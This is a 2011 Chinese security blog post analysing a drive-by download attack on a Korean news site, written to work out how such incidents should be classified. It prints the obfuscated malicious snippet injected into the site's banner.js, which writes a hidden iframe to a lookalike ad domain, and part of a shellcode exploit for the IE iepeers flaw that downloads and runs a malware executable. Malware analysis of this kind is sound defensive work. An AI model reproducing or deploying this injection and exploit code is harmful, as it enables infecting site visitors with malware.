阿碼外傳-阿碼科技非官方中文 Blog: 2011年1月31日

2011年1月31日

是惡意廣告(Malvertising)? 還是偷渡式下載(Drive-by download)?

最近,我們正在思考有關如何來產生一些惡意廣告的統計數據。

不過有時候它是很狡詐的,因為現在愈來愈多的偷渡式下載(drive-by downloads)會偽裝自已是來自廣告伺服器,試圖地隱藏它自已。

這邊有一個例子。最近我的掃瞄器偵測到一個在韓國排名第671的betanews.net的新聞網站,會進行偷渡式下載(drive-by downloads)。
當我們在寫這篇blog時,它的確還活躍著。

在它的首頁http://www.betanews.net/ 包含下面一段javascript,會來顯示廣告:
<script type="text/javascript" src="/js/banner.js"></script>

而這/js/banner.js就是被感染的檔案,在檔案的尾部被插入了以下一段混碼過的惡意程式碼:
if(document.cookie.indexOf('xxoo')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='xxoo=Yes;path=/;expires='+expires.toGMTString;document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%64%2E%69%6C%69%6B%65%63%31%69%63%6B%2E%63%6F%6D%2F%61%64%2E%61%73%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E"));}

在經過解碼後,我們可以得到:
<iframe src="http://ad.ilikec1ick.com/ad.asp" width=0 height=0></iframe>

這個 "ilikec1ick.com" 網域,顯然的是要試圖偽裝成"ilikeclick.com",這是一個韓國網路廣告商:

http://ad.ilikec1ick.com/ad.asp 包含javascript的exploit:
<script>
document.write("<bu"+"tton i"+"d='mon' o"+"ncl"+"ick"+"='sc"+"lick();' S"+"TYLE='DISP"+"LAY"+":NONE'></b"+"utton>");
var eLFGhbswV="%x9090%";var ZyOWqionK="x9090%x5858%x5858%x10EB%x4B5B";var LoLYVDGGQ="%xC933%xB966%x03B8%x3480";var cXbQEhvHS="%xBD0B%xFAE2%x05EB%xEBE8%";var UpiNKTfoo="xFFFF";var GIMIByGgI="%x54FF%xBEA3%xBDBD%xD9E2";var xsBZzgBPo="%x8D1C%";var lXOdHiLAV="xBDBD";var ZzEEOlPoD="%x36BD%xB1FD%xCD36%x1";var SbYhcedXP="0A1%xD53";var xngsAiUQI="6%x36B5%xD74A%xE4A";var KGhCigcMg="C%x0355%xBDBF%x";var iWWZubmWc="2DBD%x455F%x8ED5%x";var pefyOgmGu="BD8F%xD5BD%xCEE8%xCF";var kEqSfhtbi="D8%x36E9%xB1FB%x0";var AObPGCHfF="355%xBDBC%x36BD%xD755%xE4B";var 
(omitted)

這是 iepeers (CVE-2010-0806) 的exploit,在成功打入這個漏洞後,瀏覽器會下載http://weniz.co .kr/mall/updir/cs/pds.exe並執行它。

這個ad.asp exploit在VirusTotal的偵測率為7/42 ,而這個惡意程式pds.exe的偵測率則為27/42

好,就以這個案例來看,那它算是drive-by download攻擊呢? 還是惡意廣告攻擊呢?
這非常類似上一次的 "adshufffle.com"惡意廣告事件,這個事件也包含了一個惡意網域"ilikec1ick.com"企圖偽裝成"ilikeclick.com"。

所以這該歸類為惡意廣告嗎?並不是,攻擊者並非註冊 ilikec1ick.com 網域後,去汙染廣告本身。這情況看來,是攻擊者入侵某廣告平台後,修改竄改正常 js 文件達到散播惡意程式。不過為了延長註冊的惡意網域存活時間,所以註冊了與真正域名很相似的網域,希望減少被注意的機會。

在惡意廣告統計分類上,目前面臨一個嚴峻的挑戰。以往常見的網頁掛馬攻擊手法如汙染惡意廣告、大量SQL漏洞掛馬、大量代管主機掛馬、大量討論版漏洞掛馬...等。這個攻擊手法應該被歸納為"point of entry",然而這需要相當長時間的人工攻擊過程。

可參考:Malvertising or Drive-by web malware attack?

繼續閱讀全文...